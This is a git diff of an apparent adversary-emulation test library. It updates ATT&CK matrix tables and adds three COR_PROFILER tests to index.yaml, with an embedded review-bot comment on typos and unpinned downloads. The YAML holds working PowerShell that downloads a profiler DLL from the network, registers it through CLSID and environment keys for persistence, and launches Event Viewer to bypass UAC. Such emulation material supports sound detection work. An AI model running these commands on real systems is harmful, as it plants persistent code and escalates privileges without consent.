[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote 
Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | +| | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband 
Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | | | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 32f428cf..7d17759c 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -9,15 +9,15 @@ | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | 
[Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System 
Recovery](../../T1490/T1490.md) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System 
Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Software Deployment Tools 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2d4744b5..a799a220 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -1538,7 +1538,132 @@ privilege-escalation: - Jesse Brown, Red Canary x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1574.012 + atomic_tests: + - name: User scope COR_PROFILER + auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + description: | + Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). + The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. + Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. + If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, + the notepad process will not execute with high integrity. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan + New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + 
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + Write-Host "executing eventvwr.msc" -ForegroundColor Cyan + START MMC.EXE EVENTVWR.MSC + cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" + -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment + -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty + -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore + | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" + -Force -ErrorAction Ignore | Out-Null\n" + name: powershell + - name: System Scope COR_PROFILER + auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 + description: | + Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. + The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity + level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will + still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. 
+ + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unmanaged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + Write-Host "Creating system environment variables" -ForegroundColor Cyan + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null + New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null + cleanup_command: | + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null + Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null + name: powershell + elevation_required: true + - name: Registry-free 
process scope COR_PROFILER + auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 + description: | + Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. + + Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + supported_platforms: + - windows + input_arguments: + file_name: + description: unamanged profiler DLL + type: Path + default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll + clsid_guid: + description: custom clsid guid + type: String + default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" + dependency_executor_name: powershell + dependencies: + - description: "#{file_name} must be present\n" + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" + executor: + command: | + $env:COR_ENABLE_PROFILING = 1 + $env:COR_PROFILER = '#{clsid_guid}' + $env:COR_PROFILER_PATH = '#{file_name}' + POWERSHELL -c 'Start-Sleep 1' + cleanup_command: | + $env:COR_ENABLE_PROFILING = 0 + $env:COR_PROFILER = '' + $env:COR_PROFILER_PATH = '' + name: powershell T1546.001: technique: created: '2020-01-24T13:40:47.282Z' 
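Review bot: The "System Scope COR_PROFILER" description added in this hunk has an unbalanced backtick in "(T1574.012x64.dll`)", and the registry-free test's file_name description still reads `unamanged profiler DLL`; this index looks serializer-generated, so if it is rebuilt from the technique's own YAML under atomics/T1574.012/ the fixes belong there rather than here. The system-scope description also keeps the sentence about inheriting Event Viewer's integrity level although that executor never launches Event Viewer, so it reads as copied from the user-scope test. Separately, each get_prereq_command downloads the profiler DLL from the repository's master branch with no integrity check; pinning the URL to a commit and comparing the download against a known hash with Get-FileHash before the test uses it would keep the prerequisite reproducible and make a tampered artifact detectable. The persistence-section hunk `@@ -9890,7 +9893,132 @@` repeats the same three tests with the same text and therefore the same issues; it runs past the end of this view.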
@@ -1777,129 +1902,7 @@ privilege-escalation: - Elastic x_mitre_platforms: - Windows - identifier: T1546.015 - atomic_tests: - - name: COM Hijack Leveraging user scope COR_PROFILER - auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - description: | - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). - The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. - Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. - If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, - the notepad process will not execute with high integrity. - supported_platforms: - - windows - input_arguments: - file_name: - description: unmanaged profiler DLL - type: Path - default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll - clsid_guid: - description: custom clsid guid - type: String - default: "{09108e71-974c-4010-89cb-acf471ae9e2c}" - dependency_executor_name: powershell - dependencies: - - description: "#{file_name} must be present\n" - prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}" - executor: - command: | - Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan - New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String 
-Value "#{clsid_guid}" -Force | Out-Null - New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null - Write-Host "executing eventvwr.msc" -ForegroundColor Cyan - START MMC.EXE EVENTVWR.MSC - cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" - -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment - -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty - -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore - | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" - -Force -ErrorAction Ignore | Out-Null\n" - name: powershell - - name: COM Hijack Leveraging System Scope COR_PROFILER - auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - description: | - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. - The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity - level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will - still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. 
